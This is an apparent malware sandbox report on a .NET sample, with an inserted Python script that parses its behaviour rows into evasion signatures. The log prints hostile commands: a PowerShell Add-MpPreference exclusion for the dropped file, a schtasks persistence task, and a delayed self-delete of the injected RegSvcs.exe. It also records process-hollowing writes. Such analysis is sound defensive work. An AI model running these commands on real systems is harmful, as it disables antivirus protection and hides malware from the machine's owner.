              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596500
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596390
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596281
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596171
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596062
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595953
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595833
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595703
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595587
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595469
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595359
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595250
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595140
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595031
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594922
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594812
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594703
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594593
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594484
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8623
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 968
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 3869
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 5984
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 2309
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 7534
              Source: C:\Users\user\Desktop\file.exe TID: 2968 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 | Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe TID: 7372 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (4 occurrences)
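The evasion rows above are raw sandbox output, flattened so that the process path and the event run together. As an added example (not part of the Joe Sandbox report or its tooling), the following Python script parses rows in that flattened form and re-derives three of the signatures listed at the top of this report: "Allocates memory with a write watch", "Contains long sleeps (>= 3 min)" and "Found a high number of Window / User specific system calls". The sample rows are copied from this section. Two assumptions are labelled in the code: the delay values are treated as milliseconds (600000 reads as a 10-minute wait), and the 1000-call cut-off for the Window / User API loop is an assumed threshold, since the report does not state Joe Sandbox's own.

```python
import re
from collections import Counter, defaultdict

# Constructed sample: rows copied from the evasion section above, in the
# flattened "Source: <process><event>" form the report extraction produced.
SAMPLE_ROWS = [
    r"Source: C:\Users\user\Desktop\file.exeMemory allocated: 27C0000 memory reserve | memory write watchJump to behavior",
    r"Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeMemory allocated: DE0000 memory reserve | memory write watchJump to behavior",
    r"Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594484",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8623Jump to behavior",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 5984Jump to behavior",
    r"Source: C:\Users\user\Desktop\file.exe TID: 2968Thread sleep time: -922337203685477s >= -30000sJump to behavior",
    r"Source: C:\Windows\System32\conhost.exeLast function: Thread delayed",
    r"Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior",
]

# Event labels that the extraction glued directly onto the process path.
EVENT_LABELS = (
    "Process information set:",
    "Memory allocated:",
    "Thread delayed: delay time:",
    "Window / User API: threadDelayed",
    "Thread sleep time:",
    "Last function:",
)

# Lazy <proc> stops at the first event label; the trailing "Jump to behavior"
# link text is matched separately so it never ends up in <value>.
ROW_RE = re.compile(
    r"^Source:\s*(?P<proc>.+?)(?: TID: (?P<tid>\d+))?"
    r"(?P<event>" + "|".join(re.escape(label) for label in EVENT_LABELS) + r")"
    r"\s*(?P<value>.*?)(?:Jump to behavior)?$"
)

# "Contains long sleeps (>= 3 min)": delay values assumed to be milliseconds.
LONG_SLEEP_MS = 3 * 60 * 1000
# "Found a high number of Window / User specific system calls": assumed
# cut-off, the report does not state the sandbox's own threshold.
USER_API_LOOP_CALLS = 1000


def parse_row(row):
    """Split one flattened report row into process basename, TID, event and value.

    Returns None for lines that are not behaviour rows (headings, residue).
    """
    m = ROW_RE.match(row.strip())
    if not m:
        return None
    return {
        "process": m.group("proc").rsplit("\\", 1)[-1],
        "tid": int(m.group("tid")) if m.group("tid") else None,
        "event": m.group("event"),
        "value": m.group("value").strip(),
    }


def evaluate(rows):
    """Re-derive three evasion signatures over parsed rows.

    Returns {signature: sorted list of process basenames that triggered it}.
    Only signatures with at least one hit appear in the result.
    """
    hits = defaultdict(set)
    api_calls = Counter()  # threadDelayed call counts summed per process
    for row in rows:
        rec = parse_row(row)
        if rec is None:
            continue
        proc, event, value = rec["process"], rec["event"], rec["value"]
        if event == "Memory allocated:" and "memory write watch" in value:
            hits["write_watch_allocation"].add(proc)
        elif event == "Thread delayed: delay time:" and value.isdigit():
            if int(value) >= LONG_SLEEP_MS:
                hits["long_sleep"].add(proc)
        elif event == "Window / User API: threadDelayed" and value.isdigit():
            api_calls[proc] += int(value)
    for proc, calls in api_calls.items():
        if calls >= USER_API_LOOP_CALLS:
            hits["user_api_loop"].add(proc)
    return {name: sorted(procs) for name, procs in hits.items()}


if __name__ == "__main__":
    for signature, procs in sorted(evaluate(SAMPLE_ROWS).items()):
        print(f"{signature}: {', '.join(procs)}")
```

Feeding the whole section through `evaluate` reproduces the pattern the report shows: the dropper (file.exe), its copy in AppData\Roaming and the injected RegSvcs.exe all sleep past the 3-minute mark, while only the two .NET processes reserve memory with MEM_WRITE_WATCH. Rows whose value is not a plain integer (the negative "Thread sleep time" rows) are parsed but deliberately not scored.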
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596719
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596609
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596500
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596390
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596281
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596171
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596062
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595953
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595833
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595703
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595587
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595469
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595359
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595250
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595140
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595031
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594922
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594812
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594703
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594593
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594484
              Source: RegSvcs.exe, 00000007.00000002.2267339974.000000000163A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: RegSvcs.exe, 00000007.00000002.2267339974.000000000163A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2312284421.000000000148C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe"
Source: C:\Users\user\Desktop\file.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 422000
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 424000
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1169008
Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 422000
Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 424000
Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1057008
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmp9FE1.tmp"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmpB1B3.tmp"
Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Queries volume information: C:\Users\user\AppData\Roaming\aVmZDnwW.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.aVmZDnwW.exe.411c690.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.aVmZDnwW.exe.41c3878.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.44d29e8.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.44d29e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.446dbc8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4408da8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.aVmZDnwW.exe.41c3878.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.aVmZDnwW.exe.411c690.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2269652870.0000000003321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2314110382.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 3752, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7276, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: aVmZDnwW.exe PID: 7328, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7620, type: MEMORYSTR

Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.aVmZDnwW.exe.411c690.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.aVmZDnwW.exe.41c3878.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.44d29e8.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.44d29e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.446dbc8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4408da8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.aVmZDnwW.exe.41c3878.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.aVmZDnwW.exe.411c690.3.raw.unpack, type: UNPACKEDPE
